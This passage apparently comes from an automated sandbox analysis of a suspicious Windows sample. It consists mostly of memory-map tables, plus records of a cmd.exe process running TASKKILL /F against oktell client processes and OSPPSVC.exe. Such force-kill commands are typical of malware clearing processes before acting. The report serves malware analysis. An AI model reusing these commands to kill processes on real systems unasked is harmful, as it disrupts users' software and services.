| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #28 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM oktell.ClientStarter4.exe /IM oktell.ClientStarter4.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:28, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:07 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0xfc |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
1F8
0x
50C
0x
3D0
0x
2FC
0x
63C
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00080000 | 0x00083fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x000d0000 | 0x00136fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000140000 | 0x00140000 | 0x00140fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000150000 | 0x00150000 | 0x00150fff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x00160000 | 0x0021ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000220000 | 0x00220000 | 0x00220fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000230000 | 0x00230000 | 0x00230fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000240000 | 0x00240000 | 0x0027ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000280000 | 0x00280000 | 0x00407fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000410000 | 0x00410000 | 0x0044ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000450000 | 0x00450000 | 0x004cffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000004d0000 | 0x004d0000 | 0x00650fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000006a0000 | 0x006a0000 | 0x0079ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000007a0000 | 0x007a0000 | 0x007dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000007e0000 | 0x007e0000 | 0x008dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000910000 | 0x00910000 | 0x0094ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000950000 | 0x00950000 | 0x0098ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000990000 | 0x00990000 | 0x0099ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000009d0000 | 0x009d0000 | 0x00a0ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000a40000 | 0x00a40000 | 0x00a7ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000ab0000 | 0x00ab0000 | 0x00aeffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000b30000 | 0x00b30000 | 0x00b6ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000b80000 | 0x00b80000 | 0x00bbffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x00bc0000 | 0x00e8efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000f50000 | 0x00f50000 | 0x00f8ffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x00ff0000 | 0x01005fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000001010000 | 0x01010000 | 0x0240ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| fastprox.dll | 0x6a480000 | 0x6a515fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a520000 | 0x6a60afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdsapi.dll | 0x6a7d0000 | 0x6a7e7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x6a7f0000 | 0x6a7fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a800000 | 0x6a828fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x6a830000 | 0x6a88bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a890000 | 0x6a899fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a8a0000 | 0x6a8d4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a8e0000 | 0x6a8eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x6a8f0000 | 0x6a8f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a900000 | 0x6a910fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x73e30000 | 0x73e3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #29 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM oktell.HALMixerApp.exe /IM oktell.HALMixerApp.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:29, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:06 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x584 |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
6B0
0x
774
0x
794
0x
4F8
0x
718
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00080000 | 0x00083fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000b0000 | 0x000b0000 | 0x000effff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x000f0000 | 0x00156fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000170000 | 0x00170000 | 0x00170fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000001b0000 | 0x001b0000 | 0x001bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000001e0000 | 0x001e0000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000280000 | 0x00280000 | 0x002bffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x002c0000 | 0x0037ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x00000000003b0000 | 0x003b0000 | 0x004affff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000004b0000 | 0x004b0000 | 0x00637fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000640000 | 0x00640000 | 0x007c0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000007f0000 | 0x007f0000 | 0x0082ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000830000 | 0x00830000 | 0x0086ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000008f0000 | 0x008f0000 | 0x0092ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000960000 | 0x00960000 | 0x0099ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000a70000 | 0x00a70000 | 0x00aaffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000ab0000 | 0x00ab0000 | 0x00baffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000c00000 | 0x00c00000 | 0x00c3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000c50000 | 0x00c50000 | 0x00c8ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000d00000 | 0x00d00000 | 0x00d3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000d70000 | 0x00d70000 | 0x00daffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000dc0000 | 0x00dc0000 | 0x00dfffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x00e80000 | 0x00e95fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000ea0000 | 0x00ea0000 | 0x0229ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x022a0000 | 0x0256efff | Memory Mapped File | Readable |
|
|
|
|
| ntdsapi.dll | 0x6a4c0000 | 0x6a4d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| fastprox.dll | 0x6a4e0000 | 0x6a575fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a580000 | 0x6a5a8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x6a5b0000 | 0x6a60bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x6a710000 | 0x6a71efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a720000 | 0x6a729fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a7b0000 | 0x6a89afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a8a0000 | 0x6a8aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a8b0000 | 0x6a8c0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x6a8d0000 | 0x6a8dcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a8e0000 | 0x6a914fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x73e30000 | 0x73e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #30 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM OSPPSVC.exe /IM OSPPSVC.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:30, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:05 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0xa24 |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A34
0x
6F4
0x
5B4
0x
4D8
0x
514
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00080000 | 0x00083fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000b0000 | 0x000b0000 | 0x000effff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x000f0000 | 0x00156fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000170000 | 0x00170000 | 0x00170fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000001b0000 | 0x001b0000 | 0x001effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000230000 | 0x00230000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002a0000 | 0x002a0000 | 0x002dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000320000 | 0x00320000 | 0x0039ffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x003a0000 | 0x0045ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000460000 | 0x00460000 | 0x0049ffff | Private Memory | Readable, Writable |
|
|
|
|
